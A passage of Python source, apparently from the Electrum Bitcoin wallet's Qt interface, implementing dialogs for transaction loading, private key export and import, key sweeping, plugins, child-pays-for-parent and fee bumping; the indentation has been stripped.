layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data[15:])
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.